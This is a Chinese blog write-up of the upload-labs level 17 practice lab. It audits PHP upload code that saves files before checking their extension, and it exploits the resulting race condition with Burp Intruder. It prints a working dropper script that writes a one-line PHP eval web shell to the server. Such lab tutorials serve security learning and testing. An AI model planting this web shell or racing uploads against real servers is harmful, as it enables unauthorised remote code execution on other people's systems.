【文件上传绕过】uploads17关-条件竞争

最新推荐文章于 2024-05-13 21:19:30 发布
最新推荐文章于 2024-05-13 21:19:30 发布
阅读量586 收藏 1
点赞数 3
分类专栏: 文件上传绕过 文章标签: 条件竞争
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/114780866
版权

目录

0x001 源码审计

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

先通过move_uploaded_file把文件保存了,然后再去判断后缀名是否合法,合法就重命名,如果不合法再删除。重是重点在于,在多线程情况下,就有可能出现还没处理完,我们就访问了原文件,这样就会导致被绕过防护。

我们上传一个文件上去,后端会检验上传文件是否和要求的文件是否一致。如果不能达到要求就会删除文件,如果达成要求就会保留,那么当我们上传文件上去的时候,检测是否到达要求需要一定的时间,这个时间可长可短,但是我们确确实实在某一刻文件已经上传到了指定地址。这时候就会造成条件竞争。

0x002 绕过

test.php

<?php $file=fopen('shell.php','w+');fwrite($file,'<?php @eval($_POST[x]);?>');fclose($file);?>

访问test.php会在本地写入一个shell.php内容为一句话<?php @eval($_POST[x]);?>

上传文件抓包
在这里插入图片描述
用1这个变量作为参数发送到intruder批量发送数据包
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发包观察文件保存的地方,会看到文件是先上传到指定文件夹下后因为后缀名不合法而被删除,

在这里插入图片描述

抓包访问test.php,发送到intruder模块
在这里插入图片描述
实现的思路就是上面那个不断发送上传文件,下面这个不断发包访问文件,在某一时刻上传的文件如果刚好被访问到那么会在本地写入一个shell.php的文件,文件内容为一句话

在这里插入图片描述

多学点技术
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
文件上传漏洞 条件竞争 upload-labs 演示案例
qq_55717276的博客
03-20 4341
文件上传漏洞 条件竞争 upload-labs 演示案例
flask-uploads上传插件上传文件
12-22
创建上传文件对象: from flask_uploads import UploadSet #在这里限制允许上传类型 from flask_uploads import TEXT,IMAGES uploads=UploadSet(“UPLOADS”,extensions=TEXT+IMAGES) 导出 from .ext_uploads ...
upload-labs之第十七和十八
田田云逸的博客
10-28 2054
Pass17 打开第十七,通过提示发现跟以前的都不一样。 看来是需要进行代码审计了,那么来看看源码吧 $is_upload = false;$msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_n.
文件上传绕过方法总结(入门必看)
最新发布
qq_65165505的博客
05-13 2004
常见文件上传绕过方法的总结
文件上传绕过总结(附upload-labs 21教程)
一期一会的博客
02-11 3649
0x01 前端绕过(Less-1) 数据上传后为提交到服务器,而是由于网站页面的js对其进行过滤,确认是否可以上传,删除限制上传js规则即可。 0x02 后端绕过 1.黑名单绕过 1) 上传特殊可解析后缀 (Less-3) 按照往常改后缀为php发现不允许上传.asp,.aspx,.php,.jsp后缀文件!黑名单 尝试php2、php3、php4等特殊后缀 2) 上传.htaccess (Less-4) $deny_ext=array黑名单中没有限制.htaccess后缀的文件,因此使用.htacc
PHP代码审计:文件上传(条件竞争绕过)
qq_22132931的博客
11-07 341
PHP代码审计:文件上传(条件竞争绕过)
文件上传漏洞upload-labs1-19详解
qq_51780583的博客
03-07 1991
upload-labs1-19详解
【漏洞靶场】文件上传后端检测条件竞争--upload-labs
m0_46344990的博客
05-08 894
一、漏洞描述 在upload-labs第18中后端采用了白名单的方式对后缀进行检测。但是因为先上传后检测的原因,可以用burp的爆破模块一直上传文件,不断刷新访问路径,在删除之前访问文件可以绕过。 二、漏洞发现 先在本地写php脚本若上传成功,且知道上传后文件在网站保存的路径,可通过网页访问获得服务器配置信息,命名为z.php 直接看靶场代码,定义ext_arr为白名单数组,定义file_ext取上传文件的后缀,upload_file为拼接路径。 $_FILES['myFile']['nam
upload-labs靶场通指南(16-17
永远是少年
09-13 1062
今天继续给大家介绍渗透测试相知识,本文主要内容是upload-labs靶场通指南(16-17)。 一、第16 二、第17
upload靶场17-21】二次渲染、条件竞争、黑白名单绕过
07-20 843
upload靶场】
文件上传常用绕过方式
weixin_43077878的博客
04-02 2342
1.前端。
file-uploads-aws-react-node:react节点和express js项目可将文件上传到亚马逊Web服务(AWS)
05-17
上传文件 :laptop: 用 :backhand_index_pointing_right: 在./routes/api/profile.js更新您的AWS accessKeyId,secretAccessKey和存储桶名称 const s3 = new aws . S3 ( { accessKeyId : 'xxx' , secretAccessKey...
Django处理文件上传File Uploads的实例
09-20
今天小编就为大家分享一篇Django处理文件上传File Uploads的实例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
meteor-file-uploads:使用 Meteor 上传文件
07-16
在 Meteor 框架中,文件上传是一个常见的需求,尤其对于构建交互性强的 Web 应用来说至重要。"meteor-file-uploads" 是一个专为 Meteor 设计的文件上传解决方案,它利用了 Meteor 的实时性以及 FS 集合包来处理...
flask-uploads:Flask的文件上传
05-23
**Flask-Uploads: Flask应用的文件上传解决方案** 在Python web开发中,Flask是一个轻量级且灵活的框架,它允许开发者快速构建小型到中型的应用程序。然而,对于许多应用程序而言,处理文件上传是一项基本功能。这...
文件上传绕过】八、::$DATA上传绕过
热门推荐
ssrf
10-10 1万+
文章目录一、利用Windows特性二、源码三、使用burpsuite抓包在文件后缀加::$DATA绕过 一、利用Windows特性 在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀名 例如:"phpinfo.php::$DATA"Windows会自动去掉末尾的::$DATA变成"phpinfo.php" 二、源码 源码中未过滤::$DATA $is_upload = false; $ms
文件上传绕过】四、.htaccess文件解析漏洞
ssrf
10-10 5895
文章目录一、实验环境二、源码 一、实验环境 PHPstudy php5.6以下不带nts的版本 upload-labs-master上传漏洞靶场 服务器没有禁止.htaccess文件的上传,且服务商允许用户使用自定义.htaccess文件 本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.
文件上传绕过】十二、%00截断之POST提交
ssrf
10-11 4896
文章目录一、实验环境二、源码三、绕过 一、实验环境 如果是白名单检测的话,我们可以采用00截断绕过。00截断利用的是php的一个漏洞。在 php<5.3.4 版本中,存储文件时处理文件名的函数认为0x00是终止符。于是在存储文件的时候,当函数读到 0x00(%00) 时,会认为文件已经结束。 例如:我们上传 1.php%00.jpg 时,首先后缀名是合法的jpg格式,可以绕过前端的检测。上传到后端后,后端判断文件名后缀的函数会认为其是一个.jpg格式的文件,可以躲过白名单检测。但是在保存文件时,保
uploads-labs靶场搭建
08-22
你好!对于搭建uploads-labs靶场,你可以按照以下步骤进行操作: 1. 下载uploads-labs源代码:你可以从GitHub上找到uploads-labs的源代码,并将它下载到你的服务器或本地机器上。 2. 安装必要的依赖:uploads-labs使用了一些依赖库,你需要安装它们。通常来说,你需要安装Python和一些Python库,比如Flask、SQLAlchemy等。根据项目的要求,你可能还需要安装其他的依赖库。 3. 配置数据库:uploads-labs使用了数据库来存储数据。你需要创建一个数据库,并将数据库的连接信息配置到uploads-labs中。具体配置方式取决于你使用的数据库类型。 4. 配置uploads-labs:在项目的配置文件中,你需要修改一些配置项,包括数据库连接信息、密钥等。确保这些配置项与你的环境相匹配。 5. 运行uploads-labs:完成以上步骤后,你可以运行uploads-labs了。根据项目的要求,你可能需要运行一些命令来初始化数据库、创建表格等。 6. 访问uploads-labs:一旦uploads-labs运行起来,你可以通过浏览器访问它。通常情况下,uploads-labs会监听某个端口(比如80或8080),你可以通过访问对应的URL来使用它。 请注意,以上只是一个大致的搭建过程,具体的步骤可能因为你的环境和项目的不同而有所差异。在搭建过程中,你可能还会遇到一些其他的问题,需要根据具体情况进行解决。希望以上信息对你有所帮助!如果你需要更详细的指导,请提供更多的信息,我将尽力帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值